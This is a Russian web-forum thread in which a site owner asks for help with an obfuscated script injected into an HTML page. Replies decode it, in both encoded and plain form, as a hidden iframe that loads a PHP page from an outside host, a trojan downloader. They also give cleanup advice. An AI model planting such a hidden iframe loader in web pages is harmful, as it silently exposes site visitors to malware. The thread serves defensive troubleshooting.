Помогите расшифровать скрипт

[mrMad-Cat]

Вот это обнаружил сегодян в теле штмл страницы:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%62%36%31%63%38%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%69%6b%61%72%75%73%2d%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%6b%70%70%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%38%31%32%29%2b%27%64%38%36%66%35%5c%27%20%77%69%64%74%68%3d%32%34%34%20%68%65%69%67%68%74%3d%37%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

По ходу меня взломали и прописали это. Но правда запуститься оно не смогло так как в том файле символы " были запрещены.

Как я понял это закодированый скрипт. Но что внутри я так и непонял. Как это расшифровать и что это может быть?

[Sannis]

<script>alert(unescape("%77%69%6e%64%6f%77%2e...")); </script>

 

 

Не нужно его расшифровывать, нужно менять пароли на FTP, очищать файлы от этой гадости и проверять компьютер на трояны. Каким FTP-клиентом пользуетесь?

[sudmed]

<script>eval(unescape("window.status='Done';document.write('<iframe name=9b61c83 src=\'http://ikarus-security.com/kpp/index.php?'+Math.round(Math.random()*17812)+'d86f5\' width=244 height=73 style=\'display: none\'></iframe>')")); </script>

Заифреймили тебя, меняй пароли на FTP и проверяй комп на вирусы.

[Sannis]

sudmed, Яндекс и вправду жжёт

[mrMad-Cat]

Sannis - аттач не могу открыть - пишет нет прав доступа. И при чём тут яндекс?

Я пользуюсь FileZilla последней версии и PHPExpertEditor последней версии.

Даже не знаю, как пароль могли взломать - он 17тизначный с русскими символами и цифрами в перемешку.

Антивирус НОД32 последеней версии не взломаный (родной).

Никаких подозрительных файлов не открываю никогда. По аське на подозрительные контакты даже не отвечаю. Вообщем хз.

 

Кстати в других файлах этого нет. К счастью.

 

sudmed - как ты это расскрыл?

 

Самый прикол что сайт то новый, ему то и месяца нет, и на него заходит максимум 10 человек в сутки. И то одни и теже.

Ну и плюс тот факт что сайт написан на практически чистом штмл, с елементами пхп вставки файлов, тоесть залезть в него ну никак нельзя.

[sudmed]

sudmed, Яндекс и вправду жжёт

Sannis, это ты про яндекс применительно к данной теме или вообще про мировую революцию, Садовского и Платонов?

 

sudmed - как ты это расскрыл?

mrMad-Cat, инструментов для шифровки-расшифровки в свободном доступе полно (у меня софт специфический, тебе такой вряд ли нужен).

Хотя NOD32 неплохой антивирь, тем более потратился на лицензию, но попробуй просканировать систему любым другим нормальным антивирем.

[Sannis]

В лоб можно его прочесть как я выше написал, в аттаче просто скин, не копируется у меня то что alert выводит.

А sudmed заюзел как раз таки какой-по поисковик, или тулзу, для unescap'а. Например можно вбить любое слово в Яндекс, потом в адресной строке заменить закодированное это слово на текст скрипта, enter. Тогда в окошке для ввода слов для поиска будет расшифрованная строка

 

http://www.yandex.ru/yandsearch?clid=9582&...20%3C/script%3E

[mrMad-Cat]

Хе, ловко придумано с яндексом ))

 

Вообще прикольно вышло, пока сидел у меня по ходу пытались ещё и аську стырить. Но я её отбил. Сейчас везде менял пароли (вот это муки так муки).

 

Обнаружил что эта гадость прописалась ещё и в индекс файл форума и индекс ещё одного сайта. Короче хз как она пролезла. Надо бы каким-то мокаром проверить вообще другеи файлы.

Реально надо сканировать свой комп. Токо ставить что-то тяжёлое типа касперского или нортона совершенно не хочется.

 

ЗЫ: А нод у меня не лицензия, а просто триал версия. В ней ключи переодически новые вводишь и она работает. Купить у меня его так и не вышла - официально купить я могу только через украинского дистрибютора который продаёт в 2 раза дороже.

 

ЗЗЫ: а если честно то после последнего апдейта винды комп ведёт себя очень странно - каптчи на разных сайтах показываются только если их открывать в отдельном окне как картинки + не всегда грузится скин к примеру на яндексе и на некоторых других сайтах. Толи просто ИЕ очень строгий стал и ему ничего не нравится.

[mrMad-Cat]

О, вот каково оно! Нашёл при сканировании:

C:\Documents and Settings\mrMad-Cat\Local Settings\Temporary Internet Files\Content.IE5\W0OTWVD1\in[1].htm - JS/TrojanDownloader.Iframe.EY.gen trojan - cleaned by deleting - quarantined [1]

И как он проскачил... Наверно с кряком каким-то.

[xRay]

mrMad-Cat

Не пускай IE в инет вообще, запрети ему все в фаерволе (желатенльно не использовать встроенный фаеровл ибо г. он)

Вместо IE Opera или FireFox используй.

А IE был и будет одной большой брешью в безопасности компов.

[mrMad-Cat]

Я не люблю другие браузеры - они некоректно обрабатывают ксс и штмл, нет поддержки ксс3 и так далее. Та и ИЕ7 удобнее намного и быстрее работает. А безопасность нигде гарантироватся не может. Если захотят сломать - сломают.

 

Кстати, после последнего обновления винды у меня таки некоторые сайты отображаются без стиля. Интерестно где это исправить. Вконтакте вообще всё без столбцов и без шрифтов.

[xRay]

Ну тогда жди новых троянов т.к. они без твоего ведома через IE проползут без проблем.

Ну или запускай IE в SandBoxed-режиме (см. одноименную прожку).

[Song]

Я не люблю другие браузеры - они некоректно обрабатывают ксс и штмл, нет поддержки ксс3 и так далее.

Я бы не стал так безаппеляционно.

А то смотри глотку ведь вырвут

[Arhar]

использую 3 браузера, после каждого изменения смотрю в них результат

по статистике гугля_аналитика, посетители пользуются:

Internet Explorer 40,53 %

Opera 34,85 %

Firefox 23,96 %

остальные много меньше

так что ругай ие или не ругай, а оптимизация должна быть под него 100%

 

 

по теме, кроме указанного способа расшифровки Санниса, можно еще использовать firebug

[xRay]

Я же не говорю про то что не использовать IE вообще, а говорю про то нужно перекрывать IE доступ в инет и не юзать его для инет-серфинга (в том случае если нам есть что терять в смысле данных с компа).

[FatCat]

Вот это обнаружил сегодян в теле штмл страницы:

<script>eval(unescape("[8<] </script>

Заменил eval на alert и получил картинку:

http://i30.tinypic.com/ok6c9k.gif

Это если уж так любопытно, что за гадость у тебя сидела...

[mrMad-Cat]

FatCat Ну это я уже увидел, но вот только я не понял что этот ифрем или что это вообещ делало. Я только понял что оно было скрыто и связано с каким-то сайтом.

 

Song Я же сказал что я не люблю. Я знаю что многие юзают фаерфокс и оперу. У меня у самого стоит опера, нетскейп, фаерфокс и сафари. Но я их не могу юзать - они меня раздражают. Только для проверки того, как сайт смотрится после редактирований.